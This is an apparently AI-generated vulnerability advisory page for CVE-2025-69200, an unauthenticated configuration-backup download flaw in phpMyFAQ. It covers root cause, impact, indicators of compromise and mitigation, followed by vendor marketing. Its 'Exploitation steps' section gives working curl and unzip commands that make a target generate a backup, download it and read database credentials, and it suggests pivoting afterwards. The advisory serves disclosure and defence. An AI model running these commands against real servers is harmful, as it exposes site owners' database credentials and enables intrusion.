CVE-2025-69200: 
PHP vulnerability analysis and mitigation

Overview

CVE-2025-69200 is an unauthenticated configuration backup download vulnerability in phpMyFAQ, an open-source FAQ web application. An unauthenticated remote attacker can trigger generation of a configuration backup ZIP via POST /api/setup/backup and subsequently download the archive from a web-accessible location, exposing sensitive files such as database.php containing database credentials. All versions prior to 4.0.16 are affected, including 4.1.0-alpha through 4.1.0-beta.2 and 4.1.0-RC. The vulnerability was disclosed on December 29, 2025, and carries a CVSS v3.1 base score of 7.5 (High) (GitHub Advisory, Security Advisory).

Technical details

The root cause is a missing authentication and authorization check on the /api/setup/backup API endpoint (CWE-202: Exposure of Sensitive Information Through Data Queries). The endpoint is exposed via a default .htaccess rewrite rule (RewriteRule ^api/setup/(check|backup|update-database) api/index.php) and the controller method SetupController.php → backup() contains no calls to hasValidToken(), userIsAuthenticated(), or any equivalent permission check. When the endpoint receives any non-empty POST body (interpreted as an installed version string), it invokes Update.php → createConfigBackup(), which writes a ZIP archive to content/core/config/ and returns a publicly accessible URL to the file. A public proof-of-concept is included in the official security advisory, requiring only two curl commands to trigger and retrieve the backup (Security Advisory, Patch Commit).

Impact

Successful exploitation results in full disclosure of sensitive configuration secrets — including database host, username, and password from database.php — to any unauthenticated network attacker. This information can be leveraged for follow-on attacks such as direct database compromise, unauthorized data exfiltration, or lateral movement within the hosting infrastructure. The attack requires no user interaction and is trivially executable with a single HTTP POST request, making the effective blast radius significant for any internet-exposed phpMyFAQ instance (GitHub Advisory).

Exploitability

A public proof-of-concept exploit is included in the official GitHub Security Advisory, demonstrating the full attack chain with two curl commands. The EPSS score is approximately 2.669% (86th percentile), indicating a meaningfully elevated exploitation probability relative to most CVEs (GitHub Advisory). A Nuclei detection template has also been added to the ProjectDiscovery nuclei-templates repository, further lowering the barrier for automated scanning. There is no confirmed evidence of active in-the-wild exploitation or CISA KEV catalog listing at this time (GitHub Advisory).

Exploitation steps

  1. Reconnaissance: Identify internet-facing phpMyFAQ instances (versions < 4.0.16 or 4.1.0-alpha through 4.1.0-beta.2) using search engines like Shodan or Censys, or by fingerprinting the application via its default page title or URL structure.
  2. Trigger backup generation: Send an unauthenticated HTTP POST request to the /api/setup/backup endpoint with any non-empty body (e.g., a version string):
curl -i -X POST "http://<TARGET>/api/setup/backup" \
  -H "Content-Type: text/plain" \
  --data "4.1.0-RC"
  1. Extract backup URL: Parse the JSON response body for the backupFile field, which contains the direct URL to the generated ZIP archive under content/core/config/.
  2. Download the backup archive: Retrieve the ZIP file without authentication:
curl -i "http://<TARGET>/content/core/config/phpmyfaq-config-backup.YYYY-MM-DD.zip" -o backup.zip
  1. Extract credentials: Unzip the archive and read database.php to obtain database host, username, and password:
unzip -p backup.zip database.php
  1. Follow-on attack: Use the extracted credentials to connect directly to the database server, exfiltrate data, or pivot to other systems within the network (Security Advisory).

Indicators of compromise

  • Network: Unexpected HTTP POST requests to /api/setup/backup from external or unknown IP addresses; subsequent unauthenticated HTTP GET requests to paths matching content/core/config/phpmyfaq-config-backup.*.zip.
  • Logs: Web server access logs showing POST /api/setup/backup returning HTTP 200 from unauthenticated sessions; follow-up GET requests to the backup ZIP URL from the same or different source IPs.
  • File System: Presence of unexpected ZIP files in the content/core/config/ directory matching the pattern phpmyfaq-config-backup.YYYY-MM-DD.zip, especially if not created during a legitimate update process.
  • Application: Anomalous invocation of the backup creation function outside of scheduled maintenance or administrator-initiated update workflows (Security Advisory).

Mitigation and workarounds

Upgrade phpMyFAQ to version 4.0.16 or later, which removes the publicly accessible download link for the backup file and addresses the missing authentication on the backup endpoint (Patch Commit, GitHub Advisory). As an interim workaround, restrict network access to the /api/setup/backup endpoint via web server configuration (e.g., deny external access in .htaccess or via a WAF rule), and ensure the content/core/config/ directory is not web-accessible or that existing backup ZIPs are deleted. Audit the content/core/config/ directory for any previously generated backup archives and rotate any exposed database credentials immediately.

Community reactions

The vulnerability was reported by security researcher eclipse07077-ljw and published by the phpMyFAQ maintainer on December 29, 2025. The ProjectDiscovery team added a Nuclei detection template to their community templates repository, enabling automated scanning for vulnerable instances. Social media activity on Bluesky noted the availability of the Nuclei template, increasing awareness among the security community (GitHub Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management